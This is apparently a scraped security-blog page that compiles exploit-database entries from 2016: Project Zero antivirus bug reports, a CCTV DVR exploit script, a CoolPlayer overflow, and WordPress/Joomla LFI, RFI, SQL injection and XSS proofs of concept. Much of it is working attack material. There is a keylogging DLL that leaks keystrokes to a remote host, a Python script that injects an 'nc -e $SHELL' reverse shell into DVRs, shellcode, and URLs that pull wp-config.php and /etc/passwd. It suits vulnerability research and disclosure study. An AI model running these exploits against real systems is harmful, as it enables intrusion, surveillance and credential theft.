Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=763
The LZMA specification says the following about the memory usage of decompression:
"The size of the probability model counter arrays is calculated with the following formula: size_of_prob_arrays = 1846 + 768 * (1 << (lp + lc))"
But that formula only holds true if you keep the parameters within the specified range, which the SDK gives as:
lp - The number of literal pos bits (low bits of current position for literals).
It can be in the range from 0 to 4. The default value is 0.
lc - The number of literal context bits (high bits of previous literal).
It can be in the range from 0 to 8. The default value is 3.
If you set the parameters outside those ranges, then the rest of the assumptions don't hold and memory corruption can occur. Comodo do not attempt to keep these parameters in range, and lots of memory corruption can occur, the attached testcase should crash during an LZMA decode operation by overflowing a heap buffer.
This vulnerability is obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM.
(438.dd4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
unpack!CreateInstance+0x654bc:
000007fe`f29890cc 66f3ab rep stos word ptr [rdi]
0:010> r
rax=0000000000000400 rbx=0000000000000000 rcx=000000007ffffe88
rdx=0000000000000001 rsi=000000000b154588 rdi=000000000bbfc000
rip=000007fef29890cc rsp=000000000d6cd2c0 rbp=0000000000000000
r8=0000000000023c7c r9=000000000d6cd378 r10=0000000000000001
r11=000000000b361000 r12=0000000000000001 r13=000000000b39c38c
r14=0000000000000000 r15=000000000bbfaea4
iopl=0 nv up ei ng nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
unpack!CreateInstance+0x654bc:
000007fe`f29890cc 66f3ab rep stos word ptr [rdi]
This is trying to initialize the probabilities array, but overflowing the heap buffer allocated and running off a page boundary.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39602.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863592418
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=764
Packman is an obscure opensource executable packer that Comodo Antivirus attempts to unpack during scanning. The code is available online here:
http://packmanpacker.sourceforge.net/
If the compression method is set to algorithm 1, compression parameters are read directly from the input executable without validation. Fuzzing this unpacker revealed a variety of crashes due to this, such as causing pointer arithmetic in CAEPACKManUnpack::DoUnpack_With_NormalPack to move pksDeCodeBuffer.ptr to an arbitrary address, which allows an attacker to free() an arbitrary pointer.
This issue is obviously exploitable to execute code as NT AUTHORITY\SYSTEM.
The attached testcase will attempt to free() an invalid pointer to demonstrate this.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39601.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=765
One of the things you might expect an Antivirus engine to do reliably is parse PE files. However, after some simple testing with Avira, I found a heap underflow (that is, writing *before* a heap allocation) parsing section headers. If a section header has a very large relative virtual address, Avira will wrap calculating the offset into a heap buffer, and write attacker controlled data to it (the data from section->PointerToRawData in the input file).
The code is doing something like:
if (Section->SizeOfRawData + Section->VirtualAddress < 8192) {
buf = malloc(8192);
memcpy(buf + Section->VirtualAddress, input + Section->PointerToRawData, Section->SizeOfRawData);
}
The bug is that you need to check if Section->VirtualAddress + Section->SizeOfRawData wraps. This vulnerability is obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM.
To reproduce this bug, create an executable with a section like this:
NAME RVA VSZ RAW_SZ RAW_PTR nREL REL_PTR nLINE LINE_PTR FLAGS
.text ff003fff 1fff 1fff 200 0 0 0 0 0 ---
With Page heap enabled, this should crash reliably trying to memcpy the data from section.PointerToRawData
(e58.2b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=00000000 ecx=000007f7 edx=00000002 esi=35785219 edi=41294000
eip=7291545c esp=41bedaf0 ebp=41bedaf8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
aecore!ave_proc+0x1fc2c:
7291545c f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:011> db esi
35785219 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
35785229 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
35785239 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
35785249 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
35785259 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
35785269 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
35785279 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
35785289 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
I think it started writing to ptr - 8192, lets see what's there:
0:011> db edi - (0n8192 - (ecx * 4))
41293fdc 00 00 00 41 41 41 41 41-41 41 41 41 41 41 41 41 ...AAAAAAAAAAAAA
41293fec 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41293ffc 41 41 41 41 ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? AAAA????????????
4129400c ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
4129401c ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
4129402c ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
4129403c ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
4129404c ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
Yes!
Without page heap, you should get heap corruption, probably writing to 0x41414141.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39600.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=769
Comodo Antivirus includes a x86 emulator that is used to unpack and monitor obfuscated executables, this is common practice among antivirus products. The idea is that emulators can run the code safely for a short time, giving the sample enough time to unpack itself or do something that can be profiled. Needless to say, this is a very significant and complicated attack surface, as an attacker can trigger emulation simply by sending the victim an email or getting them to visit a website with zero user interaction.
I've found some memory corruption issues with the emulator, but Comodo also implement hundreds of shims for Win32 API calls, so that things like CreateFile, LoadLibrary, and so on appear to work to the emulated code. Astonishingly, some of these shims simply extract the parameters from the emulated address space and pass them directly to the real API, while running as NT AUTHORITY\SYSTEM. The results are then poked back in to the emulator, and the code continues.
The possible attacks here are too numerous to mention.
Here are some of the more obvious mistakes, let's start with USER32!GetKeyState (wtf!!!!). Here is the emulator shim from mach32.dll:
.text:1001D9A0 sub_1001D9A0 proc near ; DATA XREF: .data:1016B10C31o
.text:1001D9A0
.text:1001D9A0 arg_0 = dword ptr 8
.text:1001D9A0
.text:1001D9A0 55 push ebp
.text:1001D9A1 8B EC mov ebp, esp
.text:1001D9A3 8B 45 08 mov eax, [ebp+arg_0] ; pVMClass
.text:1001D9A6 8B 08 mov ecx, [eax] ; vtbl
.text:1001D9A8 8B 91 98 00 00+ mov edx, [ecx+98h] ; VArg2Rarg
.text:1001D9AE 6A 00 push 0
.text:1001D9B0 6A 06 push 6 ; TypeDword
.text:1001D9B2 6A 01 push 1 ; ParamNum
.text:1001D9B4 50 push eax ; this
.text:1001D9B5 FF D2 call edx ; VArg2Rarg(pVMClass, 1, TypeDword, 0); Virtual Arg to Real Arg
.text:1001D9B7 50 push eax ; nVirtKey
.text:1001D9B8 FF 15 F4 62 07+ call ds:GetKeyState ; Extract parameter from emulator, then return the real value (!!!)
.text:1001D9BE 98 cwde
.text:1001D9BF 5D pop ebp
.text:1001D9C0 C3 retn
.text:1001D9C0 sub_1001D9A0 endp
The emulated code can query the real keyboard state (!!!).
I've found that the simplest method of triggering the emulation is to create a DLL with a writable text section. An attacker would also need a way to exfiltrate the monitored keystrokes out of the emulator, but I've found that the shim for kernel32!SetCurrentDirectoryA actually calls GetFileAttributes() on the specified parameter, so you can encode it as a UNC path and send it over the network to your control server. This doesn't require any user interaction.
To reproduce this bug, first, create a DLL like this:
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "KERNEL32")
#pragma comment(lib, "USER32")
// This is required to trigger the generic unpacker in comodo.
#pragma comment(linker, "/SECTION:.text,ERW")
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
char path[128];
char *ptr;
ZeroMemory(path, sizeof path);
ptr = strcpy(path, "\\\\?\\UNC\\192.168.237.1\\");
ptr += strlen(ptr);
SetCurrentDirectory(path);
for (;;) {
for (*ptr = 'A'; *ptr <= 'Z'; (*ptr)++) {
if (GetKeyState(*ptr) & 0x8000) {
SetCurrentDirectory(path);
}
}
}
return TRUE;
}
Then run a minimal WebDAV server like this on the remote host:
#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
class WebDavHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_OPTIONS(self):
self.send_response(200)
self.send_header('Allow', 'OPTIONS, GET, PROPFIND')
self.send_header('DAV', '1, 2')
self.end_headers()
self.connection.shutdown(1)
def do_PROPFIND(self):
self.send_response(207)
self.send_header('Content-type', 'text/xml')
self.end_headers()
self.wfile.write('<?xml version="1.0"?><a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:"><a:response></a:response></a:multistatus>')
self.connection.shutdown(1)
SocketServer.TCPServer(('0.0.0.0', 80), WebDavHandler).serve_forever()
You only get a few seconds of logging per scan, but you can duplicate the payload thousands of times into a ZIP archive for effectively unlimited scan time. Something like this:
$ for ((i=0;i<1024;i++)); do cp keystroke.dll $i.dll; zip keystroke.zip $i.dll; rm -f $i.dll; done
Now scanning that zip file will send all keystrokes to the WebDAV server for approximately ten or so minutes (please note, there's no reason this can't be extended indefinitely), see screenshot for reference.
This is not the only attack possible, you can also extract, delete, query and use cryptographic keys, smartcards and other security hardware, because calls to CAPI routines like are all passed directly through to the real API:
ADVAPI32!CryptAcquireContextA
ADVAPI32!CryptDecrypt
ADVAPI32!CryptDeriveKey
ADVAPI32!CryptCreateHash .. and so on.
Any secrets stored in the registry are also exposed to attackers via RegQueryValueEx and GetProfileInt among others, all passed directly through to the real API. The list of possible attacks here is simply too long to enumerate, any competent developer can see this is a colossal mistake that needs to be remedied urgently.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39599.zip
#!/usr/bin/python
# Blog post: http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html
'''
Vendors List
Ademco
ATS Alarmes technolgy and ststems
Area1Protection
Avio
Black Hawk Security
Capture
China security systems
Cocktail Service
Cpsecured
CP PLUS
Digital Eye'z no website
Diote Service & Consulting
DVR Kapta
ELVOX
ET Vision
Extra Eye 4 U
eyemotion
EDS
Fujitron
Full HD 1080p
Gazer
Goldeye
Goldmaster
Grizzly
HD IViewer
Hi-View
Ipcom
IPOX
IR
ISC Illinois Security Cameras, Inc.
JFL Alarmes
Lince
LOT
Lux
Lynx Security
Magtec
Meriva Security
Multistar
Navaio
NoVus
Optivision
PARA Vision
Provision-ISR
Q-See
Questek
Retail Solution Inc
RIT Huston .com
ROD Security cameras
Satvision
Sav Technology
Skilleye
Smarteye
Superior Electrial Systems
TechShell
TechSon
Technomate
TecVoz
TeleEye
Tomura
truVue
TVT
Umbrella
United Video Security System, Inc
Universal IT Solutions
US IT Express
U-Spy Store
Ventetian
V-Gurad Security
Vid8
Vtek
Vision Line
Visar
Vodotech.com
Vook
Watchman
Xrplus
Yansi
Zetec
ZoomX
'''
from sys import argv
import optparse
from urlparse import urlparse
from re import compile
import socket
import requests
from requests.exceptions import ConnectionError, Timeout, ContentDecodingError
from socket import timeout
def main():
# parse command line options and atguments
optparser = optparse.OptionParser(usage="%s <target-url> [options]" % argv[0])
optparser.add_option('-c','--check',action="store_true",dest="checkvuln", default=False,
help="Check if target is vulnerable")
optparser.add_option('-e','--exploit', action="store", type="string", dest="connback",
help="Fire the exploit against the given target URL")
(options, args) = optparser.parse_args()
try:
target = args[0]
except IndexError:
optparser.print_help()
exit()
target_url = urlparse(target)
# validating hostname
if not target_url.hostname:
print "[X] supplied target \"%s\" is not a valid URL" % target
optparser.print_help()
exit()
# A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.
socket.setdefaulttimeout(10)
# is -c flag on check if target url is vulnrable.
if options.checkvuln is True:
print "[!] Checking if target \"%s\" is vulnable..." % target_url.netloc
try:
# Write file
raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'
% (target_url.scheme, target_url.netloc))
# Read the file.
response = raw_url_request('%s://%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))
# remove it..
raw_url_request('%s://%s//language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'
% (target_url.scheme, target_url.netloc))
except (ConnectionError, Timeout, timeout) as e:
print "[X] Unable to connect. reason: %s. exiting..." % e.message
return
if response.text[0] != '1':
print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text
return
print "[V] Target \"%s\" is vulnerable!" % target_url.netloc
# if -e is on then fire exploit,
if options.connback is not None:
# Validate connect-back information.
pattern = compile('(?P<host>[a-zA-Z0-9\.\-]+):(?P<port>[0-9]+)')
match = pattern.search(options.connback)
if not match:
print "[X] given connect back \"%s\" should be in the format for host:port" % options.connback
optparser.print_help()
exit()
# fire remote code execution!
# Three ..
try:
raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'
% (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))
# Two ...
raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'
% (target_url.scheme, target_url.netloc))
# One. Left off!
raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'
% (target_url.scheme, target_url.netloc))
except (ConnectionError, Timeout, timeout) as e:
print "[X] Unable to connect reason: %s. exiting..." % e.message
print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s" \
% (match.group('host'), match.group('port'))
# Disabling URL encode hack
def raw_url_request(url):
r = requests.Request('GET')
r.url = url
r = r.prepare()
# set url without encoding
r.url = url
s = requests.Session()
return s.send(r)
if __name__ == '__main__':
main()
================
Exploit Title: SQL Injection Vulnerability in MiCollab v7.0
Date: 3-22-2016
Vendor Homepage: http://www.mitel.com
Vendor: Mitel
Software: MiCollab End User Portal
Version: v7.0
Advisory: http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001
CVSS: 7.5
Product Summary
================
Mitel MiCollab delivers unified messaging, mobility, teleworking, and audio, web and video conferencing services tailored to the needs of today's mobile workforce. (http://www.mitel.com/products/collaboration-software/mitel-micollab)
Vulnerabilities
================
A SQL injection vulnerability has been identified in MiCollab 7.0 which, if successfully exploited, could allow an attacker to access sensitive information in the MiCollab database. (http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001)
The vulnerability is due to the unsanitized 'language' parameter in the 'mywindow' and 'PortletSelector' scripts.
Proof of concept
================
http://server/portal/portal/portal/portal/mywindow?portlets=&page=org.apache.jetspeed.om.page.impl.ContentPageImpl%40d57dde06&language=en_US';SELECT%20pg_sleep(5);--
http://server/portal/portal/portal/PortletSelector?portlets=&page=org.apache.jetspeed.om.page.impl.ContentPageImpl%40d57dde06&language=en_US';SELECT%20pg_sleep(5);--
Timeline
================
2016-02-01: Vendor advisory published
2016-03-22: PoC details published
Discovered by
================
Goran Tuzovic -- Goran [at] illumant.com
References
================
1. http://www.mitel.com/products/collaboration-software/mitel-micollab
2. http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001
About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=676
tl;dr
The code responsible for loading a suid-binary following a call to the execve syscall invalidates
the task port after first swapping the new vm_map into the old task object leaving a short race window
where we can manipulate the memory of the euid(0) process before the old task port is destroyed.
******************
__mac_execve calls exec_activate_image which calls exec_mach_imgact via the image activator table execsw.
If we were called from a regular execve (not after a vfork or via posix_spawn) then this calls load_machfile
with a NULL map argument indicating to load_machfile that it should create a new vm_map for this process:
if (new_map == VM_MAP_NULL) {
create_map = TRUE;
old_task = current_task();
}
it then creates a new pmap and wraps that in a vm_map, but doesn't yet assign it to the task:
pmap = pmap_create(get_task_ledger(ledger_task),
(vm_map_size_t) 0,
((imgp->ip_flags & IMGPF_IS_64BIT) != 0));
pal_switch_pmap(thread, pmap, imgp->ip_flags & IMGPF_IS_64BIT);
map = vm_map_create(pmap,
0,
vm_compute_max_offset(((imgp->ip_flags & IMGPF_IS_64BIT) == IMGPF_IS_64BIT)),
TRUE)
the code then goes ahead and does the actual load of the binary into that vm_map:
lret = parse_machfile(vp, map, thread, header, file_offset, macho_size,
0, (int64_t)aslr_offset, (int64_t)dyld_aslr_offset, result);
if the load was successful then that new map will we swapped with the task's current map so that the task now has the
vm for the new binary:
old_map = swap_task_map(old_task, thread, map, !spawn);
vm_map_t
swap_task_map(task_t task, thread_t thread, vm_map_t map, boolean_t doswitch)
{
vm_map_t old_map;
if (task != thread->task)
panic("swap_task_map");
task_lock(task);
mp_disable_preemption();
old_map = task->map;
thread->map = task->map = map;
we then return from load_machfile back to exec_mach_imgact:
lret = load_machfile(imgp, mach_header, thread, map, &load_result);
if (lret != LOAD_SUCCESS) {
error = load_return_to_errno(lret);
goto badtoolate;
}
...
error = exec_handle_sugid(imgp);
after dealing with stuff like CLOEXEC fds we call exec_handle_sugid.
If this is indeed an exec of a suid binary then we reach here before actually setting
the euid:
* Have mach reset the task and thread ports.
* We don't want anyone who had the ports before
* a setuid exec to be able to access/control the
* task/thread after.
ipc_task_reset(p->task);
ipc_thread_reset((imgp->ip_new_thread != NULL) ?
imgp->ip_new_thread : current_thread());
As this comment points out, it probably is quite a good idea to reset the thread, task and exception ports, and
that's exactly what they do:
...
ipc_port_dealloc_kernel(old_kport);
etc for the ports
...
The problem is that between the call to swap_task_map and ipc_port_dealloc_kernel the old task port is still valid, even though the task isn't running.
This means that we can use the mach_vm_* API's to manipulate the task's new vm_map in the interval between those two calls. This window is long enough
for us to easily find the load address of the suid-root binary, change its page protections and overwrite its code with shellcode.
This PoC demonstrates this issue by targetting the /usr/sbin/traceroute6 binary which is suid-root. Everything is tested on OS X El Capitan 10.11.2.
In our parent process we register a port with launchd and fork a child. This child sends us back its task port, and once we ack that we've got
its task port it execve's the suid-root binary.
In the parent process we use mach_vm_region to work out when the task's map gets switched, which also convieniently tells us the target binary's load
address. We then mach_vm_protect the page containing the binary entrypoint to be rwx and use mach_vm_write to overwrite it with some shellcode which
execve's /bin/zsh (because bash drops privs) try running id in the shell and note your euid.
Everything is quite hardcoded for the exact version of traceroute6 on 10.11.2 but it would be easy to make this into a very universal priv-esc :)
Note that the race window is still quite tight so you may have to try a few times.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39595.zip
# Exploit Title: CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow
# Date: 22-03-2016
# Software Link: https://sourceforge.net/projects/coolplayer/files/Coolplayer/219/CoolPlayer219_Bin.zip
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Credits: Yet another exploit code for Coolplayer (Standalone). Slightly modified version.
# * https://www.exploit-db.com/search/?action=search&description=coolplayer
#
# Category: Exploits
# Tested on: Windows XP SP3 EN
# Details: Stack overflow. Overwrite the EIP and point to ESP (iertutil.dll) to execute shellcode (calc.exe)
my $file= "exploit.m3u";
my $junk= "\x41" x 248;
my $eip= "\x97\x51\x08\x3e"; # jmp esp - iertutil.dll
my $nops = "\x90" x 10;
# shellcode (XP SP3 calc.exe)
my $shell = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open($FILE,">$file");
print $FILE $junk.$eip.$nops.$shell;
close($FILE);
print "done\n";
# Exploit Title: Arbitrary file download in Memphis Document Library 3.1.5
# Google Dork: inurl:"mdocs-posts" -site:wordpress.org
# Date: 22/03/2016
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/memphis-documents-library.3.1.5.zip
# Version: 3.1.5 (Vulnerable from 2.3 to 3.1.5, fixed in 3.1.6)
# Tested on: Ubuntu 12.04, Wordpress 4.4.2.
# CVE : N/A
# Vulnerable file: memphis-documents-library/mdocs-downloads.php
# Vulnerable function: mdocs_img_preview()
# Vulnerable GET parameter: Injectable 'mdocs-img-preview'
# Vulnerable line: 90 to 93
# Vulnerable code:
87 function mdocs_img_preview() {
88 require_once(ABSPATH . 'wp-includes/pluggable.php');
89 $upload_dir = wp_upload_dir();
90 $image = $upload_dir['basedir'].MDOCS_DIR.$_GET['mdocs-img-preview'];
91 $content = file_get_contents($image);
92 header('Content-Type: image/jpeg');
93 echo $content; exit();
94 }
# POC:
curl http://example.site.com/?mdocs-img-preview=../../../wp-config.php
-o example-wp-config.php
or if the plugin is not installed in the root folder of wordpress, for
example in the folder "mdocs-posts":
curl http://example.site.com/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
-o example-wp-config.php
# Exploit Title: Wordpress Dharma booking File Inclusion
# Date: 03/22/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage:https://wordpress.org/plugins/dharma-booking/
<https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software
Link : https://wordpress.org/plugins/dharma-booking/
# Version: <=2.28.3
# Tested on: WINDOWS/WAMP
dharma-booking/frontend/ajax/gateways/proccess.php's code:
<?php
include_once('../../../../../../wp-config.php');
$settings = get_option('Dharma_Vars');
echo $settings['paymentAccount']. $settings['gatewayid'];
require_once($_GET['gateway'].'.php');
//
POC:
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00
# Exploit Title: Wordpress brandfolder plugin / RFI & LFI
# Google Dork: inurl:wp-content/plugins/brandfolder
# Date: 03/22/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: https://brandfolder.com
# Software Link: https://wordpress.org/plugins/brandfolder/
# Version: <=3.0
# Tested on: WAMP / Windows
I-Details
The vulnerability occurs at the first lines of the file callback.php:
<?php
ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(-1);
require_once($_REQUEST['wp_abspath'] . 'wp-load.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/media.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/file.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/image.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/post.php');
$_REQUEST is based on the user input, so as you can guess,
an attacker can depending on the context, host on a malicious server
a file called wp-load.php, and disable its execution using an htaccess, or
abuse the null byte character ( %00, %2500 url-encoded)
II-Proof of concept
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=LFI/RFI
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=http://evil/
Discovered by AMAR^SHG (aka kuroi'sh).
Greetings to RxR & Nofawkx Al & HolaKo
######################
# Exploit Title : Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/easy-youtube-gallery
# Google Dork : inurl:com_easy_youtube_gallery mycategory
# Date: 2016/03/22
# Version: 1.0.2
######################
# PoC:
# mycategory=[SQL]
#
# Demo:
# http://server/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27&defaultvideo=9&Itemid=752
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
# Greetz : Milad_Hacking & FireKernel And You
######################
# Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
# Exploit Author: CrashBandicot
# Date: 2016-03-22
# Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite
# Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/
# Tested on: MSWin32
# Version: 1.0.0
# Vuln file : gallery/audio-download.php
11. if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) {
13. $file_size = $_REQUEST['file_size'];
15. $file = $_REQUEST['file_path'];
17. $filename = basename($file);
....
55. Header("Content-Disposition: attachment; filename='" . $filename . "'");
# PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
# 22/03/2016 - Informed Vendor about Issue
* Exploit Title: Multiple (persistent) XSS in ProjectSend
* Discovery Date: 2016/02/19
* Public Disclosure Date: 2016/03/17
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Project Homepage: http://www.projectsend.org/
* Software Link: http://www.projectsend.org/download/108/
* Version: r582
* Tested on: Ubuntu 14.04 with Firefox 45.0
* Category: webapps
Description
========================================================================
ProjectSend is a self-hosted PHP based file-transfer platform. Several serious vulnerabilities have been discovered so far (e.g. https://www.exploit-db.com/exploits/39385/). Here are some further persistent and non-persistent XSS vulnerabilities which affect ProjectSend.
PoC
========================================================================
1. Non-Persistent XSS
~~~~~~~~~~~~~~~~~~~~~~
1.1 - As client in searchbox on my_files/index.php:
curl 'http://projectsend.local.de/my_files/' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/my_files/' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E'
1.2 - As admin in searchboxes on "Manage Clients", "Clients groups" and "System Users":
curl 'http://projectsend.local.de/clients.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/clients.php' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E'
Output:
<input type="text" name="search" id="search" value=""><script>alert('XSS')</script>" class="txtfield form_actions_search_box" />
The searchboxes on "Clients groups", "System Users" and the "Recent activities log" are injectible in the same way.
2. Persistent XSS
~~~~~~~~~~~~~~~~~~
1.1 - As client in "MyAccount" field "Name":
No special vector required.
HTML output for input "><script>alert(1);</script>:
<input type="text" name="add_client_form_name" id="add_client_form_name" class="required" value=""><script>alert(1);</script>" placeholder="Will be visible on the client's file list" />
This XSS also affects admins when they open the "Clients" -> "Manage clients" page:
clients.php html output:
<td><input type="checkbox" name="selected_clients[]" value="2" /></td>
<td>"><script>alert(1);</script></td>
<td>Client1</td>
The fields "Adress" and "Telephone" are injectible in the same way.
1.2 As client in "File upload" field "Name":
A simple vector suffices: "<script>alert('XSS')</script>
